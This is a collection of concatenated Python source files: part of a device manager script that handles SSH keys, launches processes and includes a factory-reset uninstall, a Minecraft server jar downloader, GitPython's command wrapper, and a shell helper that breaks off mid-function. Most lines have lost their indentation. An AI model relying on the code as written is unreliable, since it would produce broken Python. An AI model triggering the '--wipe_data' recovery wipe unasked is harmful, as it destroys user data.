persisted_keys = re.sub(r'^(?!.+?from.+? )(ssh|ecdsa)', 'from="10.0.0.0/8,172.16.0.0/12,192.168.0.0/16" \\1', old_keys, flags=re.MULTILINE)
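        # e.g. a key line 'ssh-rsa AAAA... user@host' becomes
        # 'from="10.0.0.0/8,172.16.0.0/12,192.168.0.0/16" ssh-rsa AAAA... user@host',
        # restricting the persisted keys to private-network source addresses; lines
        # that already carry a from= option are skipped by the negative lookahead.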
new_keys = persisted_keys + '\n' + github_keys
if has_persisted_keys and new_keys == old_keys and os.stat(auth_keys_path)[stat.ST_MODE] == auth_keys_mode:
# nothing to do - let's avoid remount
return
try:
subprocess.check_call(["mount", "-o", "rw,remount", "/system"])
if not has_persisted_keys:
atomic_write_in_dir_neos(auth_keys_persist_path, persisted_keys, mode=auth_keys_mode)
atomic_write_in_dir_neos(auth_keys_path, new_keys, mode=auth_keys_mode)
finally:
try:
subprocess.check_call(["mount", "-o", "ro,remount", "/system"])
except:
cloudlog.exception("Failed to remount as read-only")
# this can fail due to "Device busy" - reboot if so
os.system("reboot")
raise RuntimeError
def manager_update():
update_ssh()
update_apks()
def manager_prepare():
# build cereal first
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, "cereal"))
# build all processes
os.chdir(os.path.dirname(os.path.abspath(__file__)))
for p in managed_processes:
prepare_managed_process(p)
def uninstall():
cloudlog.warning("uninstalling")
with open('/cache/recovery/command', 'w') as f:
f.write('--wipe_data\n')
# IPowerManager.reboot(confirm=false, reason="recovery", wait=true)
os.system("service call power 16 i32 0 s16 recovery i32 1")
def main():
# the flippening!
os.system('LD_LIBRARY_PATH="" content insert --uri content://settings/system --bind name:s:user_rotation --bind value:i:1')
if os.getenv("NOLOG") is not None:
del managed_processes['loggerd']
del managed_processes['tombstoned']
if os.getenv("NOUPLOAD") is not None:
del managed_processes['uploader']
if os.getenv("NOVISION") is not None:
del managed_processes['visiond']
if os.getenv("LEAN") is not None:
del managed_processes['uploader']
del managed_processes['loggerd']
del managed_processes['logmessaged']
del managed_processes['logcatd']
del managed_processes['tombstoned']
del managed_processes['proclogd']
if os.getenv("NOCONTROL") is not None:
del managed_processes['controlsd']
del managed_processes['plannerd']
del managed_processes['radard']
# support additional internal only extensions
try:
import selfdrive.manager_extensions
selfdrive.manager_extensions.register(register_managed_process) # pylint: disable=no-member
except ImportError:
pass
params = Params()
params.manager_start()
# set unset params
if params.get("IsMetric") is None:
params.put("IsMetric", "0")
if params.get("RecordFront") is None:
params.put("RecordFront", "0")
if params.get("IsFcwEnabled") is None:
params.put("IsFcwEnabled", "1")
if params.get("HasAcceptedTerms") is None:
params.put("HasAcceptedTerms", "0")
if params.get("IsUploadRawEnabled") is None:
params.put("IsUploadRawEnabled", "1")
if params.get("IsUploadVideoOverCellularEnabled") is None:
params.put("IsUploadVideoOverCellularEnabled", "1")
if params.get("IsDriverMonitoringEnabled") is None:
params.put("IsDriverMonitoringEnabled", "1")
if params.get("IsGeofenceEnabled") is None:
params.put("IsGeofenceEnabled", "-1")
if params.get("SpeedLimitOffset") is None:
params.put("SpeedLimitOffset", "0")
if params.get("LongitudinalControl") is None:
params.put("LongitudinalControl", "0")
if params.get("LimitSetSpeed") is None:
params.put("LimitSetSpeed", "0")
if params.get("LimitSetSpeedNeural") is None:
params.put("LimitSetSpeedNeural", "0")
# is this chffrplus?
if os.getenv("PASSIVE") is not None:
params.put("Passive", str(int(os.getenv("PASSIVE"))))
if params.get("Passive") is None:
raise Exception("Passive must be set to continue")
# put something on screen while we set things up
if os.getenv("PREPAREONLY") is not None:
spinner_proc = None
else:
spinner_text = "chffrplus" if params.get("Passive")=="1" else "openpilot"
spinner_proc = subprocess.Popen(["./spinner", "loading %s"%spinner_text],
cwd=os.path.join(BASEDIR, "selfdrive", "ui", "spinner"),
close_fds=True)
try:
manager_update()
manager_init()
manager_prepare()
finally:
if spinner_proc:
spinner_proc.terminate()
if os.getenv("PREPAREONLY") is not None:
return
# SystemExit on sigterm
signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
try:
manager_thread()
except Exception:
traceback.print_exc()
crash.capture_exception()
finally:
cleanup_all_processes(None, None)
if params.get("DoUninstall") == "1":
uninstall()
if __name__ == "__main__":
main()
# manual exit because we are forked
sys.exit(0)
|
download.py
|
from py_minecraft_server.utils import validate_version, soupify_url, get_vanilla_url, get_forge_url
from py_minecraft_server import logger
import asyncio
import threading
import time
import urllib.request
import os
import shutil
async def download_jar(version: str, save_location: str, is_forge: bool, create_dirs: bool = False,
overwrite: bool = False, *copy_locations):
"""
Downloads a jar to the desired location
:param version: The version of minecraft to get a server jar for
    :param save_location: The location to save the jar to
:param is_forge: True if the jar is meant to be a forge jar
    :param create_dirs: Whether or not to create the directory if it doesn't exist
:param overwrite: Delete a file in save_location if present
:param copy_locations: Additional locations to copy the downloaded file to, create_dirs will apply to copy_locations
"""
# validate version and save location
version = validate_version(version)
if not save_location.endswith(".jar"):
raise ValueError(f"Illegal save location, must be a .jar file: {save_location}")
if os.path.exists(save_location):
if not overwrite:
raise ValueError(f"Illegal save location, must be empty: {save_location}")
logger.warning(f"Deleting file @{os.path.abspath(save_location)} because overwrite={overwrite}")
os.remove(save_location)
if create_dirs:
os.makedirs(os.path.dirname(save_location), exist_ok=True)
if is_forge:
try:
download_url = soupify_url(get_forge_url(version)).find(
"div", {"class": "link-boosted"}).find("a").get("href").split("url=")[1]
except AttributeError:
raise ValueError(f"Illegal forge version, no forge download for version {version}")
else:
download_url = soupify_url(get_vanilla_url(version)).find(
"a", {"download": f"minecraft_server-{version}.jar"}).get("href")
logger.debug(f"Async download started from {download_url} to {save_location}")
await thread_download(download_url, save_location)
if copy_locations:
logger.debug(f"Copying downloaded jar file to a server")
for location in copy_locations:
copy_file(save_location, location)
async def thread_download(url: str, save_location: str):
"""Threads a download from urllib.request.urlretreive"""
t = threading.Thread(target=urllib.request.urlretrieve, args=(url, save_location), daemon=True)
t.start()
start_time = time.time()
while t.is_alive():
await asyncio.sleep(1)
logger.debug(f"Download from {url} to {save_location} completed in {(time.time() - start_time):.2f}s")
def copy_file(src: str, dst: str, create_dirs: bool = False):
"""Copy a file from src to dst allowing for dirs to be created"""
if create_dirs:
        os.makedirs(os.path.dirname(dst), exist_ok=True)
if os.path.exists(dst):
raise ValueError(f"Destination not empty {dst}")
if not os.path.isfile(src):
raise ValueError(f"Source is not a file {src}")
logger.debug(f"Copying {src} to {dst}")
shutil.copy2(src, dst)
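# A minimal usage sketch (illustrative only; the version and paths below are made-up
# examples): download a vanilla server jar, creating the target directory if needed,
# and mirror it into an existing server directory via copy_locations.
#
#   asyncio.run(download_jar("1.16.5", "jars/minecraft_server-1.16.5.jar",
#                            False, True, True, "servers/my-server/server.jar"))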
|
cmd.py
|
# cmd.py
# Copyright (C) 2008, 2009 Michael Trier (mtrier@gmail.com) and contributors
#
# This module is part of GitPython and is released under
# the BSD License: http://www.opensource.org/licenses/bsd-license.php
import os
import os.path
import sys
import select
import logging
import threading
import errno
import mmap
from contextlib import contextmanager
from subprocess import (
call,
Popen,
PIPE
)
from .util import (
LazyMixin,
stream_copy,
WaitGroup
)
from .exc import GitCommandError
from git.compat import (
string_types,
defenc,
PY3,
bchr,
# just to satisfy flake8 on py3
unicode
)
execute_kwargs = ('istream', 'with_keep_cwd', 'with_extended_output',
'with_exceptions', 'as_process', 'stdout_as_string',
'output_stream')
log = logging.getLogger('git.cmd')
__all__ = ('Git', )
if sys.platform != 'win32':
WindowsError = OSError
if PY3:
_bchr = bchr
else:
def _bchr(c):
return c
# get custom byte character handling
# ==============================================================================
## @name Utilities
# ------------------------------------------------------------------------------
# Documentation
## @{
def handle_process_output(process, stdout_handler, stderr_handler, finalizer):
"""Registers for notifications to lean that process output is ready to read, and dispatches lines to
the respective line handlers. We are able to handle carriage returns in case progress is sent by that
mean. For performance reasons, we only apply this to stderr.
This function returns once the finalizer returns
:return: result of finalizer
:param process: subprocess.Popen instance
:param stdout_handler: f(stdout_line_string), or None
    :param stderr_handler: f(stderr_line_string), or None
:param finalizer: f(proc) - wait for proc to finish"""
def parse_lines_from_buffer(fno, buf):
line = b''
bi = 0
lb = len(buf)
while bi < lb:
char = _bchr(buf[bi])
bi += 1
if char in (b'\r', b'\n') and line:
yield bi, line
line = b''
else:
line += char
# END process parsed line
# END while file is not done reading
# end
def read_lines_from_fno(fno, last_buf_list):
buf = os.read(fno, mmap.PAGESIZE)
buf = last_buf_list[0] + buf
bi = 0
for bi, line in parse_lines_from_buffer(fno, buf):
yield line
# for each line to parse from the buffer
# keep remainder
last_buf_list[0] = buf[bi:]
def dispatch_single_line(line, handler):
line = line.decode(defenc)
if line and handler:
try:
handler(line)
except Exception:
                # Keep reading, have to pump the lines empty nonetheless
log.error("Line handler exception on line: %s", line, exc_info=True)
# end
# end dispatch helper
# end single line helper
def dispatch_lines(fno, handler, buf_list):
lc = 0
for line in read_lines_from_fno(fno, buf_list):
dispatch_single_line(line, handler)
lc += 1
# for each line
return lc
# end
def deplete_buffer(fno, handler, buf_list, wg=None):
while True:
line_count = dispatch_lines(fno, handler, buf_list)
if line_count == 0:
break
# end deplete buffer
if buf_list[0]:
dispatch_single_line(buf_list[0], handler)
# end
if wg:
wg.done()
# end
fdmap = {process.stdout.fileno(): (stdout_handler, [b'']),
process.stderr.fileno(): (stderr_handler, [b''])}
if hasattr(select, 'poll'):
# poll is preferred, as select is limited to file handles up to 1024 ... . This could otherwise be
# an issue for us, as it matters how many handles our own process has
poll = select.poll()
READ_ONLY = select.POLLIN | select.POLLPRI | select.POLLHUP | select.POLLERR
CLOSED = select.POLLHUP | select.POLLERR
poll.register(process.stdout, READ_ONLY)
poll.register(process.stderr, READ_ONLY)
closed_streams = set()
while True:
# no timeout
try:
poll_result = poll.poll()
except select.error as e:
if e.args[0] == errno.EINTR:
continue
raise
# end handle poll exception
for fd, result in poll_result:
if result & CLOSED:
closed_streams.add(fd)
else:
dispatch_lines(fd, *fdmap[fd])
# end handle closed stream
# end for each poll-result tuple
if len(closed_streams) == len(fdmap):
break
# end its all done
# end endless loop
        # Deplete all remaining buffers
for fno, (handler, buf_list) in fdmap.items():
deplete_buffer(fno, handler, buf_list)
# end for each file handle
for fno in fdmap.keys():
poll.unregister(fno)
# end don't forget to unregister !
else:
# Oh ... probably we are on windows. select.select() can only handle sockets, we have files
# The only reliable way to do this now is to use threads and wait for both to finish
# Since the finalizer is expected to wait, we don't have to introduce our own wait primitive
# NO: It's not enough unfortunately, and we will have to sync the threads
wg = WaitGroup()
for fno, (handler, buf_list) in fdmap.items():
wg.add(1)
t = threading.Thread(target=lambda: deplete_buffer(fno, handler, buf_list, wg))
t.start()
# end
# NOTE: Just joining threads can possibly fail as there is a gap between .start() and when it's
# actually started, which could make the wait() call to just return because the thread is not yet
# active
wg.wait()
# end
return finalizer(process)
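# A minimal usage sketch (illustrative only; `url` and `path` stand in for real
# values): stream a long-running git command through the dispatcher above, logging
# progress lines that git writes to stderr.
#
#   proc = Popen(['git', 'clone', '--progress', url, path], stdout=PIPE, stderr=PIPE)
#   handle_process_output(proc, None, log.info, finalizer=lambda p: p.wait())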
def dashify(string):
return string.replace('_', '-')
## -- End Utilities -- @}
class Git(LazyMixin):
"""
The Git class manages communication with the Git binary.
It provides a convenient interface to calling the Git binary, such as in::
g = Git( git_dir )
g.init() # calls 'git init' program
rval = g.ls_files() # calls 'git ls-files' program
``Debugging``
Set the GIT_PYTHON_TRACE environment variable print each invocation
of the command to stdout.
Set its value to 'full' to see details about the returned values.
"""
__slots__ = ("_working_dir", "cat_file_all", "cat_file_header", "_version_info",
"_git_options", "_environment")
# CONFIGURATION
# The size in bytes read from stdout when copying git's output to another stream
max_chunk_size = 1024 * 64
git_exec_name = "git" # default that should work on linux and windows
git_exec_name_win = "git.cmd" # alternate command name, windows only
# Enables debugging of GitPython's git commands
GIT_PYTHON_TRACE = os.environ.get("GIT_PYTHON_TRACE", False)
# Provide the full path to the git executable. Otherwise it assumes git is in the path
_git_exec_env_var = "GIT_PYTHON_GIT_EXECUTABLE"
GIT_PYTHON_GIT_EXECUTABLE = os.environ.get(_git_exec_env_var, git_exec_name)
class AutoInterrupt(object):
"""Kill/Interrupt the stored process instance once this instance goes out of scope. It is
used to prevent processes piling up in case iterators stop reading.
Besides all attributes are wired through to the contained process object.
The wait method was overridden to perform automatic status code checking
and possibly raise."""
__slots__ = ("proc", "args")
def __init__(self, proc, args):
self.proc = proc
self.args = args
def __del__(self):
if self.proc is None:
return
proc = self.proc
self.proc = None
if proc.stdin:
proc.stdin.close()
proc.stdout.close()
proc.stderr.close()
# did the process finish already so we have a return code ?
if proc.poll() is not None:
return
# can be that nothing really exists anymore ...
if os is None:
return
# try to kill it
try:
os.kill(proc.pid, 2) # interrupt signal
proc.wait() # ensure process goes away
except (OSError, WindowsError):
pass # ignore error when process already died
except AttributeError:
# try windows
# for some reason, providing None for stdout/stderr still prints something. This is why
                # we simply use the shell and redirect to nul. It's slower than CreateProcess, question
                # is whether we really want to see all these messages. It's annoying no matter what.
call(("TASKKILL /F /T /PID %s 2>nul 1>nul" % str(proc.pid)), shell=True)
# END exception handling
def __getattr__(self, attr):
return getattr(self.proc, attr)
def wait(self):
"""Wait for the process and return its status code.
:raise GitCommandError: if the return status is not 0"""
status = self.proc.wait()
if status != 0:
raise GitCommandError(self.args, status, self.proc.stderr.read())
# END status handling
return status
# END auto interrupt
class CatFileContentStream(object):
"""Object representing a sized read-only stream returning the contents of
an object.
It behaves like a stream, but counts the data read and simulates an empty
stream once our sized content region is empty.
        If not all data is read to the end of the object's lifetime, we read the
rest to assure the underlying stream continues to work"""
__slots__ = ('_stream', '_nbr', '_size')
def __init__(self, size, stream):
self._stream = stream
self._size = size
self._nbr = 0 # num bytes read
# special case: if the object is empty, has null bytes, get the
# final newline right away.
if size == 0:
stream.read(1)
# END handle empty streams
def read(self, size=-1):
bytes_left = self._size - self._nbr
if bytes_left == 0:
return ''
if size > -1:
# assure we don't try to read past our limit
size = min(bytes_left, size)
else:
                # they try to read all, make sure it's not more than what remains
size = bytes_left
# END check early depletion
data = self._stream.read(size)
self._nbr += len(data)
# check for depletion, read our final byte to make the stream usable by others
if self._size - self._nbr == 0:
self._stream.read(1) # final newline
# END finish reading
return data
def readline(self, size=-1):
if self._nbr == self._size:
return ''
# clamp size to lowest allowed value
bytes_left = self._size - self._nbr
if size > -1:
size = min(bytes_left, size)
else:
size = bytes_left
# END handle size
data = self._stream.readline(size)
self._nbr += len(data)
# handle final byte
if self._size - self._nbr == 0:
self._stream.read(1)
# END finish reading
return data
def readlines(self, size=-1):
if self._nbr == self._size:
return list()
# leave all additional logic to our readline method, we just check the size
out = list()
nbr = 0
while True:
line = self.readline()
if not line:
break
out.append(line)
if size > -1:
nbr += len(line)
if nbr > size:
break
# END handle size constraint
# END readline loop
return out
def __iter__(self):
return self
def next(self):
line = self.readline()
if not line:
raise StopIteration
return line
def __del__(self):
bytes_left = self._size - self._nbr
if bytes_left:
# read and discard - seeking is impossible within a stream
# includes terminating newline
self._stream.read(bytes_left + 1)
# END handle incomplete read
def __init__(self, working_dir=None):
"""Initialize this instance with:
:param working_dir:
Git directory we should work in. If None, we always work in the current
directory as returned by os.getcwd().
It is meant to be the working tree directory if available, or the
.git directory in case of bare repositories."""
super(Git, self).__init__()
self._working_dir = working_dir
self._git_options = ()
# Extra environment variables to pass to git commands
self._environment = {}
# cached command slots
self.cat_file_header = None
self.cat_file_all = None
def __getattr__(self, name):
"""A convenience method as it allows to call the command as if it was
an object.
:return: Callable object that will execute call _call_process with your arguments."""
if name[0] == '_':
return LazyMixin.__getattr__(self, name)
return lambda *args, **kwargs: self._call_process(name, *args, **kwargs)
def _set_cache_(self, attr):
if attr == '_version_info':
            # We only use the first 4 numbers, as everything else could be strings in fact (on windows)
version_numbers = self._call_process('version').split(' ')[2]
self._version_info = tuple(int(n) for n in version_numbers.split('.')[:4] if n.isdigit())
else:
super(Git, self)._set_cache_(attr)
# END handle version info
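    # For example, 'git version 2.11.0' is parsed into (2, 11, 0), and a Windows
    # build string like 'git version 2.11.0.windows.1' also yields (2, 11, 0),
    # because non-numeric components are filtered out above.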
@property
def working_dir(self):
""":return: Git directory we are working on"""
return self._working_dir
@property
def version_info(self):
"""
:return: tuple(int, int, int, int) tuple with integers representing the major, minor
and additional version numbers as parsed from git version.
This value is generated on demand and is cached"""
return self._version_info
def execute(self, command,
istream=None,
with_keep_cwd=False,
with_extended_output=False,
with_exceptions=True,
as_process=False,
output_stream=None,
stdout_as_string=True,
**subprocess_kwargs
):
"""Handles executing the command on the shell and consumes and returns
the returned information (stdout)
:param command:
The command argument list to execute.
It should be a string, or a sequence of program arguments. The
program to execute is the first item in the args sequence or string.
:param istream:
Standard input filehandle passed to subprocess.Popen.
:param with_keep_cwd:
Whether to use the current working directory from os.getcwd().
The cmd otherwise uses its own working_dir that it has been initialized
with if possible.
:param with_extended_output:
Whether to return a (status, stdout, stderr) tuple.
:param with_exceptions:
Whether to raise an exception when git returns a non-zero status.
:param as_process:
Whether to return the created process instance directly from which
streams can be read on demand. This will render with_extended_output and
with_exceptions ineffective - the caller will have
to deal with the details himself.
It is important to note that the process will be placed into an AutoInterrupt
wrapper that will interrupt the process once it goes out of scope. If you
use the command in iterators, you should pass the whole process instance
instead of a single stream.
:param output_stream:
If set to a file-like object, data produced by the git command will be
output to the given stream directly.
This feature only has any effect if as_process is False. Processes will
always be created with a pipe due to issues with subprocess.
This is merely a workaround, as data will be copied from the
output pipe to the given output stream directly.
Judging from the implementation, you shouldn't use this flag!
:param stdout_as_string:
if False, the commands standard output will be bytes. Otherwise, it will be
decoded into a string using the default encoding (usually utf-8).
The latter can fail, if the output contains binary data.
:param subprocess_kwargs:
Keyword arguments to be passed to subprocess.Popen. Please note that
some of the valid kwargs are already set by this method, so the ones you
specify must not clash with them.
:return:
* str(output) if extended_output = False (Default)
* tuple(int(status), str(stdout), str(stderr)) if extended_output = True
if output_stream is set, the stdout value will be your output stream:
* output_stream if extended_output = False
* tuple(int(status), output_stream, str(stderr)) if extended_output = True
Note git is executed with LC_MESSAGES="C" to ensure consistent
output regardless of system language.
:raise GitCommandError:
:note:
If you add additional keyword arguments to the signature of this method,
you must update the execute_kwargs tuple housed in this module."""
if self.GIT_PYTHON_TRACE and (self.GIT_PYTHON_TRACE != 'full' or as_process):
log.info(' '.join(command))
# Allow the user to have the command executed in their working dir.
if with_keep_cwd or self._working_dir is None:
cwd = os.getcwd()
else:
cwd = self._working_dir
# Start the process
env = os.environ.copy()
env["LC_MESSAGES"] = "C"
env.update(self._environment)
proc = Popen(command,
env=env,
cwd=cwd,
stdin=istream,
stderr=PIPE,
stdout=PIPE,
# Prevent cmd prompt popups on Windows by using a shell.
# See https://github.com/gitpython-developers/GitPython/pull/126
shell=sys.platform == 'win32',
close_fds=(os.name == 'posix'), # unsupported on windows
**subprocess_kwargs
)
if as_process:
return self.AutoInterrupt(proc, command)
# Wait for the process to return
status = 0
stdout_value = b''
stderr_value = b''
try:
if output_stream is None:
stdout_value, stderr_value = proc.communicate()
# strip trailing "\n"
if stdout_value.endswith(b"\n"):
stdout_value = stdout_value[:-1]
if stderr_value.endswith(b"\n"):
stderr_value = stderr_value[:-1]
status = proc.returncode
else:
stream_copy(proc.stdout, output_stream, self.max_chunk_size)
stdout_value = output_stream
stderr_value = proc.stderr.read()
# strip trailing "\n"
if stderr_value.endswith(b"\n"):
stderr_value = stderr_value[:-1]
status = proc.wait()
# END stdout handling
finally:
proc.stdout.close()
proc.stderr.close()
if self.GIT_PYTHON_TRACE == 'full':
cmdstr = " ".join(command)
def as_text(stdout_value):
return not output_stream and stdout_value.decode(defenc) or '<OUTPUT_STREAM>'
# end
if stderr_value:
log.info("%s -> %d; stdout: '%s'; stderr: '%s'",
cmdstr, status, as_text(stdout_value), stderr_value.decode(defenc))
elif stdout_value:
log.info("%s -> %d; stdout: '%s'", cmdstr, status, as_text(stdout_value))
else:
log.info("%s -> %d", cmdstr, status)
# END handle debug printing
if with_exceptions and status != 0:
if with_extended_output:
raise GitCommandError(command, status, stderr_value, stdout_value)
else:
raise GitCommandError(command, status, stderr_value)
if isinstance(stdout_value, bytes) and stdout_as_string: # could also be output_stream
stdout_value = stdout_value.decode(defenc)
# Allow access to the command's status code
if with_extended_output:
return (status, stdout_value, stderr_value.decode(defenc))
else:
return stdout_value
def environment(self):
return self._environment
def update_environment(self, **kwargs):
"""
Set environment variables for future git invocations. Return all changed
values in a format that can be passed back into this function to revert
the changes:
``Examples``::
old_env = self.update_environment(PWD='/tmp')
self.update_environment(**old_env)
:param kwargs: environment variables to use for git processes
:return: dict that maps environment variables to their old values
"""
old_env = {}
for key, value in kwargs.items():
# set value if it is not None
if value is not None:
if key in self._environment:
old_env[key] = self._environment[key]
else:
old_env[key] = None
self._environment[key] = value
# remove key from environment if its value is None
elif key in self._environment:
old_env[key] = self._environment[key]
del self._environment[key]
return old_env
@contextmanager
def custom_environment(self, **kwargs):
"""
A context manager around the above ``update_environment`` method to restore the
environment back to its previous state after operation.
``Examples``::
with self.custom_environment(GIT_SSH='/bin/ssh_wrapper'):
repo.remotes.origin.fetch()
:param kwargs: see update_environment
"""
old_env = self.update_environment(**kwargs)
try:
yield
finally:
self.update_environment(**old_env)
def transform_kwargs(self, split_single_char_options=False, **kwargs):
"""Transforms Python style kwargs into git command line options."""
args = list()
for k, v in kwargs.items():
if len(k) == 1:
if v is True:
args.append("-%s" % k)
elif type(v) is not bool:
if split_single_char_options:
args.extend(["-%s" % k, "%s" % v])
else:
args.append("-%s%s" % (k, v))
else:
if v is True:
args.append("--%s" % dashify(k))
elif type(v) is not bool:
args.append("--%s=%s" % (dashify(k), v))
return args
@classmethod
def __unpack_args(cls, arg_list):
if not isinstance(arg_list, (list, tuple)):
# This is just required for unicode conversion, as subprocess can't handle it
# However, in any other case, passing strings (usually utf-8 encoded) is totally fine
if not PY3 and isinstance(arg_list, unicode):
return [arg_list.encode(defenc)]
return [str(arg_list)]
outlist = list()
for arg in arg_list:
if isinstance(arg, (list, tuple)):
outlist.extend(cls.__unpack_args(arg))
elif not PY3 and isinstance(arg, unicode):
outlist.append(arg.encode(defenc))
# END recursion
else:
outlist.append(str(arg))
# END for each arg
return outlist
def __call__(self, **kwargs):
"""Specify command line options to the git executable
for a subcommand call
:param kwargs:
is a dict of keyword arguments.
these arguments are passed as in _call_process
but will be passed to the git command rather than
the subcommand.
``Examples``::
git(work_tree='/tmp').difftool()"""
self._git_options = self.transform_kwargs(
split_single_char_options=True, **kwargs)
return self
def _call_process(self, method, *args, **kwargs):
"""Run the given git command with the specified arguments and return
the result as a String
:param method:
is the command. Contained "_" characters will be converted to dashes,
such as in 'ls_files' to call 'ls-files'.
:param args:
is the list of arguments. If None is included, it will be pruned.
This allows your commands to call git more conveniently, as a None
argument is simply treated as if it had not been passed at all.
:param kwargs:
is a dict of keyword arguments.
This function accepts the same optional keyword arguments
as execute().
``Examples``::
git.rev_list('master', max_count=10, header=True)
:return: Same as ``execute``"""
# Handle optional arguments prior to calling transform_kwargs
# otherwise these'll end up in args, which is bad.
_kwargs = dict()
for kwarg in execute_kwargs:
try:
_kwargs[kwarg] = kwargs.pop(kwarg)
except KeyError:
pass
# Prepare the argument list
opt_args = self.transform_kwargs(**kwargs)
ext_args = self.__unpack_args([a for a in args if a is not None])
args = opt_args + ext_args
def make_call():
call = [self.GIT_PYTHON_GIT_EXECUTABLE]
# add the git options, then reset them to empty
# to avoid side effects
call.extend(self._git_options)
self._git_options = ()
call.extend([dashify(method)])
call.extend(args)
return call
# END utility to recreate call after changes
if sys.platform == 'win32':
try:
try:
return self.execute(make_call(), **_kwargs)
except WindowsError:
# if we already switched to git.cmd, or the default executable was overridden, fail permanently
if self.GIT_PYTHON_GIT_EXECUTABLE != self.git_exec_name:
raise
# END handle overridden variable
type(self).GIT_PYTHON_GIT_EXECUTABLE = self.git_exec_name_win
try:
return self.execute(make_call(), **_kwargs)
finally:
import warnings
msg = "WARNING: Automatically switched to use git.cmd as git executable"
msg += ", which reduces performance by ~70%."
msg += "It is recommended to put git.exe into the PATH or to "
msg += "set the %s " % self._git_exec_env_var
msg += "environment variable to the executable's location"
warnings.warn(msg)
# END print of warning
# END catch first failure
except WindowsError:
raise WindowsError("The system cannot find or execute the file at %r" % self.GIT_PYTHON_GIT_EXECUTABLE)
# END provide better error message
else:
return self.execute(make_call(), **_kwargs)
# END handle windows default installation
def _parse_object_header(self, header_line):
"""
:param header_line:
<hex_sha> type_string size_as_int
:return: (hex_sha, type_string, size_as_int)
:raise ValueError: if the header contains indication for an error due to
incorrect input sha"""
tokens = header_line.split()
if len(tokens) != 3:
if not tokens:
raise ValueError("SHA could not be resolved, git returned: %r" % (header_line.strip()))
else:
raise ValueError("SHA %s could not be resolved, git returned: %r" % (tokens[0], header_line.strip()))
# END handle actual return value
# END error handling
if len(tokens[0]) != 40:
raise ValueError("Failed to parse header: %r" % header_line)
return (tokens[0], tokens[1], int(tokens[2]))
def _prepare_ref(self, ref):
# required for command to separate refs on stdin, as bytes
refstr = ref
if isinstance(ref, bytes):
# Assume 40 bytes hexsha - bin-to-ascii for some reason returns bytes, not text
refstr = ref.decode('ascii')
elif not isinstance(ref, string_types):
refstr = str(ref) # could be ref-object
if not refstr.endswith("\n"):
refstr += "\n"
return refstr.encode(defenc)
def _get_persistent_cmd(self, attr_name, cmd_name, *args, **kwargs):
cur_val = getattr(self, attr_name)
if cur_val is not None:
return cur_val
options = {"istream": PIPE, "as_process": True}
options.update(kwargs)
cmd = self._call_process(cmd_name, *args, **options)
setattr(self, attr_name, cmd)
return cmd
def __get_object_header(self, cmd, ref):
cmd.stdin.write(self._prepare_ref(ref))
cmd.stdin.flush()
return self._parse_object_header(cmd.stdout.readline())
def get_object_header(self, ref):
""" Use this method to quickly examine the type and size of the object behind
the given ref.
:note: The method will only suffer from the costs of command invocation
once and reuses the command in subsequent calls.
:return: (hexsha, type_string, size_as_int)"""
cmd = self._get_persistent_cmd("cat_file_header", "cat_file", batch_check=True)
return self.__get_object_header(cmd, ref)
def get_object_data(self, ref):
""" As get_object_header, but returns object data as well
:return: (hexsha, type_string, size_as_int,data_string)
:note: not threadsafe"""
hexsha, typename, size, stream = self.stream_object_data(ref)
data = stream.read(size)
del(stream)
return (hexsha, typename, size, data)
def stream_object_data(self, ref):
""" As get_object_header, but returns the data as a stream
:return: (hexsha, type_string, size_as_int, stream)
:note: This method is not threadsafe, you need one independent Command instance per thread to be safe !"""
cmd = self._get_persistent_cmd("cat_file_all", "cat_file", batch=True)
hexsha, typename, size = self.__get_object_header(cmd, ref)
return (hexsha, typename, size, self.CatFileContentStream(size, cmd.stdout))
def clear_cache(self):
"""Clear all kinds of internal caches to release resources.
Currently persistent commands will be interrupted.
:return: self"""
self.cat_file_all = None
self.cat_file_header = None
return self
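# --- illustrative usage (sketch, not part of GitPython itself) --------------
# A minimal sketch of how the dynamic command interface above is meant to be
# used, assuming the GitPython package ("git") is installed and the current
# directory is a repository. __getattr__/_call_process turn attribute access
# into git invocations, and transform_kwargs maps max_count=3 to --max-count=3.
def _example_git_usage():
    from git import Git
    g = Git(".")                                   # working_dir="."
    print(g.version_info)                          # e.g. (2, 39, 2)
    print(g.rev_list("HEAD", max_count=3))         # runs: git rev-list --max-count=3 HEAD
    # temporarily override the environment for a single operation
    with g.custom_environment(GIT_SSH_COMMAND="ssh -o BatchMode=yes"):
        print(g.ls_remote("--heads"))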
|
shell.py
|
"""Command execution in bash shells"""
import time
from . import config
from .logging import logger
def run_shell_command(command: str, log_command: bool = True):
"""
Runs a command in a bash shell and logs the output of the command in (near)real-time.
Args:
command: The command to run
log_command: When true, then the command itself is logged before execution
Returns:
Either (in order)
- False when the exit code of the command was not 0
- True when there was no output to stdout
- The output to stdout, as an array of lines
"""
import shlex, subprocess, threading
if log_command:
logger.log(command, format=logger.Format.ITALICS)
process = subprocess.Popen(shlex.split(config.bash_command_string()) + ['-c', command],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
universal_newlines=True)
# keep stdout output
output_lines = []
# unfortunately, only file descriptors and the system streams can be passed to
# subprocess.Popen(..) (and not custom streams without a file handle).
# So in order to be able to log the output in real-time, we have to
# read the output streams of the process from two separate threads
def read_process_stdout():
for line in process.stdout:
output_lines.append(line)
logger.log(line, format=logger.Format.VERBATIM)
def read_process_stderr():
for line in process.stderr:
logger.log(line, format=logger.Format.VERBATIM, is_error=True)
read_stdout_thread = threading.Thread(target=read_process_stdout)
read_stdout_thread.start()
read_stderr_thread = threading.Thread(target=read_process_stderr)
read_stderr_thread.start()
# wait until the process finishes
while process.poll() is None:
time.sleep(0.005)
read_stdout_thread.join()
read_stderr_thread.join()
exitcode = process.returncode
if exitcode != 0:
logger.log(f'exit code {exitcode}', is_error=True, format=logger.Format.ITALICS)
return False
return output_lines or True
def sed_command(replace: {str: str}) -> str:
"""
Creates a sed command string from a dictionary of replacements
Examples:
>>> print(sed_command({'foo':'a','bar':'b'}))
sed "s/foo/a/g; s/bar/b/g"
"""
def quote(s):
return str(s).replace('/', '\\/').replace('"', '\\"').replace('\n', '\\\\\n')
return 'sed "' + \
'; '.join(
['s/' + quote(search) + '/' + quote(_replace) + '/g' for search, _replace in
replace.items()]) \
+ '"'
if __name__ == "__main__":
run_shell_command('ping -c 3 google.com; ping null')
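# --- illustrative usage (sketch) ---------------------------------------------
# Shows how sed_command() composes with run_shell_command() in a bash pipeline;
# it relies on the package's config/logger exactly as the functions above do,
# and the file name is only a placeholder.
def _example_sed_pipeline(path: str = "settings.ini"):
    replacements = {"localhost": "127.0.0.1", "DEBUG": "INFO"}
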